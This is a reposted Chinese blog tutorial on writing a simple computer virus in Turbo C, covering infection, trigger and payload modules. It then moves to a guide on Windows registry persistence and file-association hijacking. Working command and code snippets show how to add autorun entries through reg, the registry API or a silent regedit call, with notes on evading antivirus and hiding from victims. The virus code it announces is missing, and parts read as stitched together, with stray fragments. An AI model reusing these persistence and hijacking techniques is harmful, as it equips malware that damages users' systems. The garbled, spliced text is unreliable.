c语言病毒分析(转)


以下为本人网上转载内容,仅供爱好者参考之用:


在分析病毒机理的基础上,用C语言写了一个小病毒作为实例,用TURBOC2.0实现.

        [Abstract] This paper introduce the charateristic of the computer virus,then show a simple example written by TURBOC2.0.
一、什么是病毒   
    恶意软件可能是第一个对我们产生影响的计算机安全问题.所以病毒在信息安全中是很重要的.
    我们要对付病毒,就要了解病毒.
    写一些病毒是一个很好的办法.
    如果要写一个病毒,先要知道它是什么.可以给病毒一个定义,这一定义是被广泛认可的。Frederic Cohen博士在《计算机病毒简短讲座》中提到的:
“……一种能够通过修改自身来包括或释放自我拷贝而传染给其他程序的程序。“
     
      其实病毒和普通程序并无太大不同,而且通常比较简单,不像很多程序那样复杂。只不过病毒里面用到一些正常程序一般不会用到的技术。
     要编制一个病毒,首先要知道病毒的运行机理。
     不论是何种病毒,它一般在结构上分为三个功能模块:感染机制,触发机制和有效载荷。
     在病毒结构中,首要的而且唯一必需的部分是感染机制。病毒首先必须是能够繁殖自身的代码,这是病毒之所以成为病毒的根本
原因。我们可以用一段类C伪码来表示这个过程。


InfectSection()
     {
      if (infectable_object_found
        &&object_not_already_infect)
             infect_object;
       }
            
  病毒的第二个主要构成部分是有效载荷触发事件.一个病毒来到你的电脑后,不大可能立即发作,否则它不会被传播得很远.潜伏的敌人永远要比能见到的敌人危险得多.病毒一般是在找到一定数量的感染体,某一日期或时间,某一段文本后触发.
一个简单的触发机制可能是这样工作的:
            TriggerSection()
            {
                if (date_is_Friday_13th_and_time_is_03:13:13)
                                                             set_trigger_status_to_yes;
            }
  有效载荷就是病毒用来骚扰你的电脑的方法,有触发机制的病毒一般也有有效载荷。它可以是任意的给你发一条一次性简单的愚弄信息,重新格式化你的磁盘,把它自己邮给你的E_mail通信者都可以成为有效的负荷。简单的有效负荷可以如下进行:
          Executesection()
          {
              if (trigger_statue_is_yes)
                  execute_payload;                      
          }       
二、 编制病毒的语言
    最常见的编制病毒的语言有汇编语言、VB、C 语言等,我们可以来看一看一个有名的病毒论坛上认为学写病毒要掌握的基础:
    1).Win32编程,进程,线程,内存,等等。
  2).32位汇编,以指令用法为主。386汇编就比较够用了。
  3).PE格式,有精力还可以看一下其它可能被感染的文件的文件格式。
  4).调试技术。VC,TD32,SoftIce,等等。
    要掌握的东西确实很多,还多听都没听过,很吓人.但实际上,即使我们对计算机的原理和操作系统不很了解,而且不熟悉除C
以外的其他语言,只要我们对C的库函数有一定了解,就可以写一些类似病毒的东西.
三 用C编制病毒
    以TurboC2.0为例.它的库函数可以实现很多功能.
    如以下两个函数:
    1).findfirst和findnext函数:在dir.h。findfirst用来找各种类型的文件,可以得到文件名文件长度,文件属性等,findnext和findfirst配合使用,用来找到下一个同类型的文件。
    2).remove函数:在stdio.h.只要知道文件名,可以删除任意类型的文件.
                
四 一个C病毒   
         <<计算机病毒解密>>上有一句比较经典的话,"或许把恶意软件造成的损害说成是心理上的损害
    可能会更恰当一些".从这个意义上说,我的病毒是非常典型的病毒.
         下面是我写的病毒.
    它主要由四个模块组成.
    RubbishMaker()可用来在当前目录下生成大量随机命名的垃圾文件.
    CreatEXE()将在C盘的敏感地方放置几个.exe垃圾,它们要隐蔽一些。
    Remove()会删掉你的一些东西,所以千万不要随便运行这个程序.
    Breed()是C_KILLER的精华所在,它将kill所有的c程序,并利用它们繁殖自身.
    前三个是有效负载.
    第四个可以说是它的感染机制.
 

1.可以用于病毒开机自启动的注册表位置:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]

[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]

[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]

以上只是默认运行的部分注册表位置,其实还可以在系统启动外客(shell explorer.exe)后添加病毒路径等方法,同样可以实现通过注册表开机自动运行。

2.关联文件类型

在注册表HKEY_CLASS_ROOT下可以更改文件类型的默认启动程序,比如更改EXE文件的启动程序为你写的病毒,那么每当运行exe程序时,病毒将替代程序运行

例:

到注册表HKEY_CLASS_ROOT\exefile\shell\open\command下,修改“默认”修改为c:\windows\svchost.exe "%1" %*,那么以后运行.exe文件时只会运行c:\windows\svchost.exe3.程序修改注册表的方法:

(1)使用REG命令添加修改注册表:

REG命令使用方法具体可以在命令提示符中输入REG /?和通过参阅Windows命令帮助查看

主要格式:

REG Operation [Parameter List]

  Operation  [ QUERY   | ADD    | DELETE  | COPY    |

               SAVE    | LOAD   | UNLOAD  | RESTORE |

               COMPARE | EXPORT | IMPORT ]

例:向HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run中添加名为SVCHOST的键值,键值内容为C:\Windows\system\SVCHOST.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SVCHOST /d C:\Windows\system\SVCHOST.exe /f

调用reg命令的方法主要有两中,一种是使用C语言中的system函数,另一种是使用C语言中的spawn类函数(如函数spawnl)。具体system和spawnl使用方法请参见其它资料,这里仅举一例:

例:用system函数通过reg命令向HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run中添加名为SVCHOST的键值,键值内容为C:\Windows\system\SVCHOST.exe

system("reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v SVCHOST /d C:\\Windows\\system\\SVCHOST.exe /f");

评论与小结:使用REG命令添加注册表可以达到直接调用系统命令(工具)来修改注册表的目的,如果被杀毒软件拦截也只会显示修改操作的发出来自C:\WINDOWS\system32\reg.exe,使病毒不容易被寻找到。但由于REG命令属于控制台命令,因此调用时有黑色的控制台出现,是病毒的征兆被感染用户发现,不利于病毒隐藏。

(2)使用WindowsAPI添加修改注册表

WindowsAPI为我们提供了大约25个函数。他提供了对注册表的读取,写入,删除,以及打开注册表及键值时所有函数这些函数有: 

RegCloseKey

RegConnectRegistry

RegCreateKey

RegCreateKeyEx

RegDeleteKey

RegDeleteVale   

RegEnumKey

RegFlushKey

RegGetKeySecurity(Windows9X不适用)

RegLoadKey 

RegNotifyChangeKeyValue(Windows9X不适用)

RegOpenKey

RegOpenKeyEx

RegQueryInfoKey

RegQueryValue 

RegQueryValueEx

RegReplaceKey

RegRestoreKey(Windows9X不适用)

RegSaveKey

RegSetKeySecurity(Windows9X不适用)

RegSetValue

RegSetValueEx

RegUnLoadKey 

等,函数的使用需要在32位C编译器下调用windows.h文件,同(1)中一样,具体函数的使用方法请参见其它资料,这里仅举一例.

例:通过WindowsAPI向HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run中添加名为SVCHOST的键值,键值内容为C:\Windows\system\SVCHOST.exe

TRegistry* Registry; 

Registry=new TRegistry();

Registry->RootKey=HKEY_LOCAL_MACHINE;

Registry->OpenKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",FALSE);

Registry->WriteString("SVCHOST","C:\\Windows\\system\\SVCHOST.exe");WriteString()

Registry->CloseKey();

评论与小结:使用WindowsAPI添加注册表可以达到直接无须调用系统命令(工具)就可以修改注册表的目的,但如果被杀毒软件拦截会显示修改操作来自的病毒体文件所在的路径,使病毒容易被寻找到。但由于WindowsAPI可以“悄悄”的完成修改,在前台没有任何显示,因此调用时如果未被拦截,很难被感染用户发觉,利于病毒隐藏。

(3)使用REGEDIT添加修改注册表

REGEDIT就是注册表编辑器,但它其实有一个/s的参数,只要调用regedit /s 注册表文件,就可以在后台无提示的修改注册表。同样需要用spawnl函数调用它。

例:通过spawnl函数调用regedit向HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run中添加名为wjview32的键值,键值内容为C:\windows\wjview32.com /s

char *regadd={"REGEDIT4\n\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]\n\"wjview32\"=\"C:\\\\windows\\\\wjview32.com /s\""};

FILE *output;

if((output=fopen("$$$$$","w"))!=NULL)

{

  fprintf(output,regadd);

  fclose(output);

  spawnl(1,"c:\\windows\\regedit.exe"," /s $$$$$",NULL);

}

评论与小结:使用spawnl函数+REGEDIT可以兼得WindowsAPI和REG两种方法的优势,添加注册表如果被杀毒软件拦截会显示修改操作来自c:\windows\regedit.exe,使病毒的路径难以被寻找到,利于病毒的隐藏。REGEDIT可以“悄悄”的完成修改,在前台没有任何显示,因此调用时如果未被拦截,很难被感染用户发觉,利于病毒隐藏。

原文地址:https://www.cnblogs.com/intcry/p/2014541.html